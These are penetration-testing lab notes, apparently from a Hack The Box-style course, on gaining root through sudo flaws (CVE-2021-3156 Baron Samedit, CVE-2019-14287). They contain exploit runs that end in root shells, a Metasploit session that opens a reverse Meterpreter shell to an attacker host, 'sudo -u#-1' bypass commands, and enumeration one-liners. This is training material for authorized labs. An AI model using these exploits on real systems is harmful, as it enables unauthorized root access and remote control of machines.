~$ ./sudo-hax-me-a-sandwich 1
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
# id
uid=0(root) gid=0(root) groups=0(root)
Metasploit exploit:
msf6 exploit(linux/local/sudo_baron_samedit) > set session 3
session => 3
msf6 exploit(linux/local/sudo_baron_samedit) > set lhost tun0
lhost => 10.10.16.110
msf6 exploit(linux/local/sudo_baron_samedit) > set lport 443
lport => 443
msf6 exploit(linux/local/sudo_baron_samedit) > run
[*] Started reverse TCP handler on 10.10.16.110:443
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: x86
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/D9M8vioM30.py' (763 bytes) ...
[*] Writing '/tmp/libnss_CcyrQ/Q .so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 10.129.203.52
[+] Deleted /tmp/D9M8vioM30.py
[+] Deleted /tmp/libnss_CcyrQ/Q .so.2
[+] Deleted /tmp/libnss_CcyrQ
[*] Meterpreter session 4 opened (10.10.16.110:443 -> 10.129.203.52:50308) at 2024-04-08 08:23:25 -0400
meterpreter > ls
Listing: /tmp
=============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 207 fil 2024-04-08 08:20:01 -0400 cPGjXRBL
meterpreter > getuid
Server username: root
meterpreter >
CVE-2019-18634 - Sudo before 1.8.26
All versions below 1.8.28 - CVE-2019-14287
Requires only a single prerequisite. It had to allow a user in the /etc/sudoers file to execute a specific command
Example 1
$ sudo -l
[sudo] password for cry0l1t3: **********
User cry0l1t3 may run the following commands on Penny:
ALL=(ALL) /usr/bin/id
$ sudo -u#-1 id
root@nix02:/home/cry0l1t3# id
uid=0(root) gid=1005(cry0l1t3) groups=1005(cry0l1t3)
Example 2
$ sudo -l
Matching Defaults entries for htb-student on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User htb-student may run the following commands on ubuntu:
(ALL, !root) /bin/ncdu
$ sudo -u#-1 /bin/ncdu
Type the “b” letter on your keybord to open a new shell terminal on the system
$ sudo -u#-1 /bin/ncdu
# id
uid=0(root) gid=1001(htb-student) groups=1001(htb-student)
#
Example 3
sudo -l
Password:
Matching Defaults entries for user on XXX-NIX04:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User ben may run the following commands on XXX-NIX04:
(ALL, !root) /bin/bash
$ sudo -u#-1 /bin/bash
root@XXX-NIX04:/home/user#
Example 4 - iptable and iptable-save
More exploits
Sudo Buffer Overflow (CVE-2019-18634, version < 1.8.26)
Sudo Security Bypass (CVE-2019-14287, version < 1.8.28)
Binaries
ls -l /bin /usr/bin/ /usr/sbin/
GTFOBins
for i in $(curl -s https://gtfobins.github.io/ | html2text | cut -d" " -f1 | sed '/^[[:space:]]*$/d');do if grep -q "$i" installed_pkgs.list;then echo "Check GTFO for: $i";fi;done
Trace System Calls
strace ping -c1 10.129.112.20
Configuration files
find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null
